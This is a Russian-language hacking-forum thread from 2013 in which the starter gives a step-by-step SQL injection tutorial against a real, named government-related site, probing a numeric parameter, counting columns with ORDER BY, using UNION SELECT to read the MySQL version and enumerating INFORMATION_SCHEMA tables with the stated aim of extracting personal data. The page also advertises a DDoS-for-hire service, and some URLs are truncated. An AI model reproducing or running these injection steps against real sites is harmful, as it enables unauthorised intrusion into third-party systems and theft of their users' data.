SQL-инъекция, от а до я. - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Все инфопродукты и приватная информация бесплатно
Старый 14.04.2013, 12:48   #1 (permalink)
SOCKS4
 
Аватар для marick
 
Регистрация: 17.12.2012
Сообщений: 170
Member ID: 33106
ICQ 357888

Репутация: 522
Репутация: 522
Сказал(а) спасибо: 155
Поблагодарили 174 раз(а) в 58 сообщениях
Топикстартер (автор темы) По умолчанию SQL-инъекция, от а до я.

Многие из продвинутых пользователей стремящихся в хакеры и крякеры рано или поздно сталкиваются с необходимостью научится взламывать сайты, кто-то, таким образом, пытается заработать, кто-то делает это for fun, а кто-то только потому что взламывать сайты must have для каждого хакера.
Одним из наиболее известных сегодня методом взлома сайтов является SQL injection. Этот способ представляет из себя внедрении в запрос произвольного SQL-кода. Принцип атаки построен на точном понимании что же такое SQL-запрос – в двух словах это язык запросов необходимый для работы с базой данных, т.е. какждый SQL запрос дает возможность получить доступ к какой либо строке, столбцу либо иному массиву информации, содержащемуся в базе данных. А следовательно SQL injection- есть ничто иное как модифицированный запрос, позволяющий получить доступ к иным(не всегда нужным) частям БД. Очень наглядно SQL injection описывается в FAQ на форуме www.antichat.ru, лучшего объяснения не смог придумать, следовательно:
«Допустим вы бросили пить Вот вы решили пойти в магазин за кефиром, и специально написали на бумажке "один пакет кефира за 30 рублей", чтобы не забыть зачем вы пришли в магазин. Но у вас есть друг-алкоголик(хакер, он же злоумышленник), который исправил надпись на бумажке(провел атаку SQL injection) на такую "один пакет кефира за 30 рублей или одну бутылку водки за 200 рублей".
SELECT товар FROM магазин WHERE (тип='кефир' AND цена='30') OR (тип='водка' AND цена='200') LIMIT 1
В итоге вы приходите в магазин и говорите, используя бумажку(входящий параметр): "Дайте один пакет кефира за 30 рублей или одну бутылку водки за 200 рублей"»
Из вышеизложенного следует, что SQL injection может дать возможность атакующему выполнить произвольный запрос к базе данных, получить возможность чтения и/или записи локальных файлов и выполнения произвольных команд на атакуемом сервере.
Из самого определения становится понятно, что SQL инъекция становится возможной там, где есть входящий параметр, а следовательно такой тип уязвимость легко обнаружить и закрыть, но статистика Veracode показывает, что около 32% веб-приложений уязвимы к SQL-инъекциям, и их доля стабильно держится на одном уровне уже шесть кварталов подряд. По данным Trustwave, в прошлом году 26% всех взломов в интернете было проведено именно таким способом. Более того, у так пользователей решивших стать хакерам в помощи множество инструкций и программ для проведения SQL injection. Вот, к примеру, одна из любимых мною статей про взлом сайты через программы http://proxy-base.org/f71/vzlom_sait...mmy-15909.html, миниповаренная книга скрипит-кидди.
Более продвинутым пользователям совершенно понятно, что там где появились публичные программы для взлома сайтов и поиска уязвимостей уже делать нечего, тем не менее для тренировки и общего понимания принципа работы SQL-запросов вполне подойдет.
SQL-инъекция, как указывалось раньше может быть в любом месте, где есть какой-либо входящий параметр от пользователя будь то номер вашей анкеты в социальной сети или адрес вот этой статьи на сайте.
Как же подобраться к SQL инъекции?!
Атака осуществляется посредством преждевременного завершения текстовой строки и присоединения к ней новой команды. Поскольку к вставленной команде перед выполнением могут быть добавлены дополнительные строки, злоумышленник заканчивает внедряемую строку меткой комментария «--». Весь последующий текст во время выполнения не учитывается.
Проще говоря, чтобы найти место для инъекции нужно пробовать вставлять в поля одинарные или двойные кавычки.

Для обнаружения инъекции можно также использовать манипулирование с числовыми параметрами в GET запросах, например:

http://una.ge/eng/artdetail.php?group=articles&id=102
(Ну вот, опять без примеров не получается)

Здесь параметр id – числовой и равен 102
После выполнения этого запроса мы увидим страничку с заголовком секции «UN Session in Georgian Parliament». Проверим этот параметр на уязвимость, но вначале попробуем вот такой запрос:

http://una.ge/eng/artdetail.php?group=articles&id=101

Заголовок секции теперь «'The Messenger'-World Refugee Day». Возвращаемся на предыдущую секцию (id=102) с заголовком «UN Session in Georgian Parliament». И вот тут уже проверяем на уязвимость, введем в параметре id не просто значение, а выражение 102-1, запрос в таком случае примет вид:

http://una.ge/eng/artdetail.php?group=articles&id=102-1

В результате этого запроса мы попали на секцию «'The Messenger'-World Refugee Day», id которой равен 101. Что произошло? А произошло выполнение арифметического выражения 102-1=101, т.е. скрипт artdetail.php не отфильтровал выражение в значении параметра id, а выполнил его. Это и есть SQL инъекция (http://www.fssr.ru/hz.php?name=News&...ticle&sid=6491).
Например, многие компании открывают Интернет доступ к архивам своих пресс-релизов. Ссылка на такой пресс-релиз может выглядеть следующим образом:
http://www.thecompany.com/pressRelea...essReleaseID=5
Тогда сам SQL запрос может выглядеть так:
SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = 5
Сервер баз данных сформирует ответ с данными для пятого пресс-релиза и отправит его клиенту. Чтобы определить, является ли приложение уязвимым к SQL-инъекции, попробуйте ввести дополнительное условие к WHERE:
http://www.thecompany.com/pressRelea...essReleaseID=5 AND 1=1
...тогда сервер базы данных выполнит следующий запрос:
SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = 5 AND 1=1
...и если этот запрос также вернет пятый пресс-релиз, то приложение восприимчиво к SQL-инъекции, так как часть введенных данных интерпритируется как SQL-код.
Безопасное приложение отклонит этот запрос, поскольку значение "5 и 1=1" приведет к ошибке и сервер не будет отображать пресс-релиз.

Продолжение следует…
__________________
Федерация Ботнетов России icq357888
marick вне форума   Ответить с цитированием
5 пользователя(ей) сказали cпасибо:
Старый 15.04.2013, 16:27   #2 (permalink)
SOCKS4
 
Аватар для marick
 
Регистрация: 17.12.2012
Сообщений: 170
Member ID: 33106
ICQ 357888

Репутация: 522
Репутация: 522
Сказал(а) спасибо: 155
Поблагодарили 174 раз(а) в 58 сообщениях
Топикстартер (автор темы) По умолчанию Re: SQL-инъекция, от а до я.

Продолжение.
Для того, чтобы получить уверенность в том, что мы на правильном пути, еще немного экспериментируем с адресной строкой, добавляя кавычки и получая запросы вида
http://una.ge/eng/artdetail.php?group=articles&"id="102""
http://una.ge/eng/artdetail.php?group=articles&"id=102"
Оба эти запроса выполняются, после чего мы продолжаем исследовать наш сайт использую параметр order by. Данный параметр служит для отбора полей таблицы, используя различные значения параметра order by
устанавливаем количество полей в таблице, составляя запрос вида
http://una.ge/eng/artdetail.php?grou...rder+by+8(этот параметр мы и будем в дальнейшем менять)—
Знаки + в данном выражении приравниваются к пробелу, выражение заканчивается «--«, когда значение параметра достигло 10 (http://una.ge/eng/artdetail.php?grou...1+order+by+8--) сервер перестал отображать информацию. Следовательно количество полей равно 9. Зная количество полей мы можем использовать параметр Union select для объединения запросов. Составляя запрос с данным параметром будем использовать несуществующий параметр ID очень часто использую отрицательный параметр (-1) , составляя запрос мы просто через запятую перечисляем доступные поля СУБД http://una.ge/eng/artdetail.php?grou...,4,5,6,7,8,9-- На экране отобразилась цифра 3 и информация «CAP 31.Dec.1965».
Продолжаем ковыряться в сайте, для успешного проведения нашей операции установим версию mysql для дальнейшего поиска инструментов, для этого нам пригодится параметр version(), в нашем случае на экране отобразилась цифра 3, а значит данный параметр применяем в 3 поле, составляем запрос вида http://una.ge/eng/artdetail.php?grou...,4,5,6,7,8,9--
Выполнив данный запрос мы получили информацию о версии mysql, в нашем случае это 5.1.68-cll. Версии выше 5 очень радует каждого, кто встал на путь взлома сайтов, потому как начиная с 5 версии присутствует INFORMATION_SCHEMA. Составляем запрос .
http://una.ge/eng/artdetail.php?grou...CHEMA.TABLES--

Выполнив данный запрос мы получаем одну таблицу, далее используем параметр table_name, чтобы проанализировать имя и содержание полей таблицы.

http://una.ge/eng/artdetail.php?grou..._SCHEMA.TABLES
выполнив данный запрос получаем название поля vacancies_geo
После чего добавляем параметр limit, используется для того чтобы усовершенствовать и прокачать наш запрос и извлечь еще больше информации из полей, не забывая, что нашей целью являются персональные данные…вот наш запрос
http://una.ge/eng/artdetail.php?grou..._SCHEMA.TABLES +Limit+1,1--
Выполнив который на веселом экране видим надпись CLIENT_STATISTICS.
Окрыленные успехом, начинаем менять переменные в параметре limits, составляя запросы типа
http://una.ge/eng/artdetail.php?grou..._SCHEMA.TABLES +Limit+2,1--
http://una.ge/eng/artdetail.php?grou..._SCHEMA.TABLES +Limit+3,1--
и так далее…
В случае с нашим сайтом меня лично заинтересовало название Files при выполнении запроса
http://una.ge/eng/artdetail.php?grou...20+Limit+9,1--
После чего я попробовал вытянуть содержимое из данного поля
http://una.ge/eng/artdetail.php?grou...9+from+files--
Но данный метод никакого результата не дал…, хотя при работе с некоторыми другими сайтами при выполнении данного запроса зачастую удавалось получить доступ к полям таблицы
Продолжение следует...
__________________
Федерация Ботнетов России icq357888
marick вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 08.09.2013, 12:23   #3 (permalink)
HTTP
 
Регистрация: 24.08.2013
Сообщений: 11
Member ID: 34021

Репутация: 3
Репутация: 3
Сказал(а) спасибо: 0
Поблагодарили 1 раз в 1 сообщении
По умолчанию Re: SQL-инъекция, от а до я.

где продолжение?
UziUser вне форума   Ответить с цитированием
Старый 02.11.2013, 11:51   #4 (permalink)
HTTP
 
Регистрация: 22.05.2012
Сообщений: 12
Member ID: 27736

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: SQL-инъекция, от а до я.

Познавательно,спс
redjox вне форума   Ответить с цитированием
Старый 02.11.2013, 17:08   #5 (permalink)
SOCKS4
 
Регистрация: 05.06.2010
Сообщений: 168
Member ID: 8025

Репутация: 265
Репутация: 265
Сказал(а) спасибо: 76
Поблагодарили 89 раз(а) в 41 сообщениях
По умолчанию Re: SQL-инъекция, от а до я.

ТС, тебе мало статьей на эту изьежженую тему? решил еще и своей хернёй разбавить?
0ТЕЦ вне форума   Ответить с цитированием
Старый 02.11.2013, 17:19   #6 (permalink)
SOCKS5
 
Регистрация: 03.10.2011
Сообщений: 266
Member ID: 19552

Репутация: 656
Репутация: 656
Сказал(а) спасибо: 126
Поблагодарили 220 раз(а) в 64 сообщениях
Стрелка Re: SQL-инъекция, от а до я.

в 100, если не в 1000 раз познавательней и проще будет:

[
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 очко(ов) репутации(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
masscontrol вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL инъекция. ReisendeR Системы и сети, взлом и защита, анонимность в сети 44 12.03.2014 02:23
инъекция в exe файл applegrub Программирование 6 31.01.2012 18:31
SQL-инъекция на blogs.icq.com NeXt. Информация об ICQ 0 19.10.2010 13:44
SQL инъекция (в т.ч. и blind SQL) 2FED Системы и сети, взлом и защита, анонимность в сети 0 10.01.2010 19:58
SQL-инъекция в e107 Plugin userjournals_menu ReisendeR Системы и сети, взлом и защита, анонимность в сети 0 13.05.2009 08:35




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.